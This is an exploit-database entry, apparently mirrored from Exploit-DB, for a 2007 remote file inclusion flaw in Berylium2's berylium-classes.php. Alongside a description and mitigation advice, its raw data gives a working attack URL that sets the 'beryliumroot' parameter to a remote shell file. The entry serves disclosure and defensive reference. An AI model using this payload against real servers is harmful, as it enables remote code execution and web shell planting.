header-logo
Suggest Exploit
vendor:
Berylium2
by:
ThE TiGeR
5.5
CVSS
MEDIUM
Remote file inclusion
CWE
Product Name: Berylium2
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Berylium2 Remote file inclusion

This exploit allows an attacker to include remote files through the 'berylium-classes.php' script in Berylium2. By manipulating the 'beryliumroot' parameter, an attacker can include a malicious file hosted on a remote server.

Mitigation:

To mitigate this vulnerability, the vendor should sanitize user input and validate the source of included files. Users are advised to update to a patched version of Berylium2.
Source

Exploit-DB raw data:

#Berylium2 Remote file inclusion

#Download script : http://berylium.org/source/be2-2003-08-18.tar.gz

#Thanks Str0ke

#Exploit :

#http://victim.com/[berylium2_path]/code/berylium-classes.php?beryliumroot=shell.txt?

#Discovered by : ThE TiGeR

#Miro_Tiger[at]hotmail[dot]com

#Greetz : â„¢~${{BraveHeart}}$~â„¢ 

# milw0rm.com [2007-05-07]

Navigation

Suggest Exploit

Services By CQR